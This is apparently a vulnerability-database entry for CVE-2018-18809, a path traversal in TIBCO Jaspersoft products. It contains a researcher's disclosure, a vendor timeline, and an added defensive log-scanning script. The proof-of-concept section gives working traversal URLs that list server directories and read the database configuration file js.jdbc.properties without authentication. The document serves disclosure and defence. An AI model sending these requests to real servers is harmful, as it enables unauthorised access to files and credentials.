Security vulnerability in multiple TIBCO Software products

Vulnerability ID: 1524101
Vulnerability type: Path traversal
Published: 2019-03-06
Updated: 2019-03-06
CVE ID: CVE-2018-18809
CNNVD-ID: CNNVD-201903-233
Platform: N/A
CVSS score: N/A
|Vulnerability sources
https://www.securityfocus.com/bid/107351
https://cxsecurity.com/issue/WLB-2019090068
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201903-233
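|Vulnerability details
The default server configuration component in multiple TIBCO Software products contains a path traversal vulnerability. An attacker can exploit this vulnerability to access the contents of the host system. The following products and versions are affected: TIBCO JasperReports Library versions 6.3.4, 6.4.1, 6.4.2, 6.4.21, 7.1.0 and 7.2.0; TIBCO JasperReports Library (Community Edition) 6.7.0 and earlier, 7.1.0 and earlier; TIBCO JasperReports Library for ActiveMatrix BPM 6.4.3 and earlier; TIBCO Jaspersoft for AWS with Multi-Tenancy 7.1.0 and earlier; TIBCO Jaspersoft Reporting and Analytics for AWS 7.1.0 and earlier.
|Vulnerability exploit (EXP)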
Title: CVE-2018-18809 Path traversal in Tibco JasperSoft
Credit: Elar Lang / https://security.elarlang.eu
Vendor/Product: Tibco JasperSoft (https://www.jaspersoft.com/)
Vulnerability: Path traversal
CVE: CVE-2018-18809

# Path traversal
The vulnerability is in the reportresource/reportresource/ service, in the
resource parameter. There is a "defence": the value of the resource param must
start with net/sf/jasperreports/.

Available to remote, unauthenticated users.

## Proof-of-Concept
Reading file listing:
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../

Reading file content (js.jdbc.properties as an example):
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties

# List of Systems Affected, Related fixes and releases:
"TIBCO Security Advisory: March 6, 2019 - TIBCO JasperReports Library -
2018-18809"
https://www.tibco.com/support/advisories/2019/03/tibco-security-advisory-march-6-2019-tibco-jasperreports-library-2018-18809


# Vulnerability Disclosure Timeline

2018-10-15 | me > Tibco | Notification to security@tibco.com
2018-10-15 | Tibco > me | Thanks for PoC

2018-10-29 | me > Tibco | How is it going? No fixes even for their own site.
2018-10-15 | Tibco > me | Explanation of policy that they treat everyone
equally and as no fix is available for their customers, they cannot fix their
own site either.

2019-01-11 | Tibco > me | Issue is still under investigation. Issue
discovery credits and publishing details coordination for future.
2019-01-11 | me > Tibco | Response, agreement with credits.

2019-03-06 | Tibco > me | "We published security advisories"
2019-03-06 | Tibco | "TIBCO Security Advisory: March 6, 2019 - TIBCO
JasperReports Library - 2018-18809"

2019-04-21 | me > Tibco | I'm going to write Full Disclosure, but your own
demo site is still vulnerable.
..
2019-04-26 | Tibco > me | Demo site fixed/updated now.

2019-09-07 | me | Full Disclosure on https://security.elarlang.eu

# A more detailed description is available in the blog:
https://security.elarlang.eu/cve-2018-18809-path-traversal-in-tibco-jaspersoft.html

--
Elar Lang
Blog @ https://security.elarlang.eu
Pentester, lecturer @ http://www.clarifiedsecurity.com
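
An added example, not part of the original advisory and not TIBCO's code: the prefix-only test the advisory describes, next to a check that resolves `..` segments before comparing, applied to constructed request targets as a log-review aid. It assumes POSIX-style path resolution; every sample path other than the two resource values quoted in the advisory is made up.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs

REQUIRED_PREFIX = "net/sf/jasperreports/"     # prefix named in the advisory
ENDPOINT = "/reportresource/reportresource/"  # service named in the advisory

def naive_check(resource):
    """Prefix-only test, as the advisory describes the 'defence'."""
    return resource.startswith(REQUIRED_PREFIX)

def normalized_check(resource):
    """Resolve '.' and '..' first (assumed POSIX-style), then require the prefix."""
    if "\\" in resource or "\x00" in resource:
        return False
    resolved = posixpath.normpath(resource)
    # normpath drops a trailing slash, so add one back before comparing.
    return (resolved + "/").startswith(REQUIRED_PREFIX)

def classify(request_target):
    """Return 'n/a', 'rejected', 'ok' or 'traversal' for one request target."""
    parts = urlsplit(request_target)
    if ENDPOINT not in parts.path:
        return "n/a"                      # not the affected service
    values = parse_qs(parts.query).get("resource")  # percent-decodes once
    if not values:
        return "n/a"
    resource = values[0]
    if not naive_check(resource):
        return "rejected"                 # the prefix test alone already blocks it
    return "ok" if normalized_check(resource) else "traversal"

BASE = "/jasperserver-pro" + ENDPOINT + "?resource="
# Constructed sample request targets (not taken from real logs).
SAMPLES = [
    BASE + "net/sf/jasperreports/example/logo.png",
    BASE + "net/sf/jasperreports/a/../b.png",          # '..' that stays inside
    BASE + "net/sf/jasperreports/../../../../",
    BASE + "net/sf/jasperreports/../../../../js.jdbc.properties",
    BASE + "other/file.txt",
    "/jasperserver-pro/login.html",
]

def scan(targets):
    """Pair each request target with its verdict."""
    return [(classify(t), t) for t in targets]

if __name__ == "__main__":
    for verdict, target in scan(SAMPLES):
        print(f"{verdict:10} {target}")
```

Requests classified as `traversal` pass the prefix test yet resolve outside `net/sf/jasperreports/`, which is the pattern to look for in access logs of unpatched servers.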


|Affected products
TIBCO Jaspersoft Reporting and Analytics for AWS 7.1.1
TIBCO Jaspersoft for AWS with Multi-Tenancy 7.1.1
TIBCO JasperReports Server for ActiveMatrix BPM 6.4.4
TIBCO JasperReports Server Community Edition 7.1.1
TIBCO JasperReports Server Community Edition
|References

Source: www.tibco.com
Link: https://www.tibco.com/support/advisories/2019/03/tibco-security-advisory-march-6-2019-tibco-jasperreports-library-2018-18809

Source: www.tibco.com
Link: http://www.tibco.com/services/support/advisories

Source: nvd.nist.gov
Link: https://nvd.nist.gov/vuln/detail/CVE-2018-18809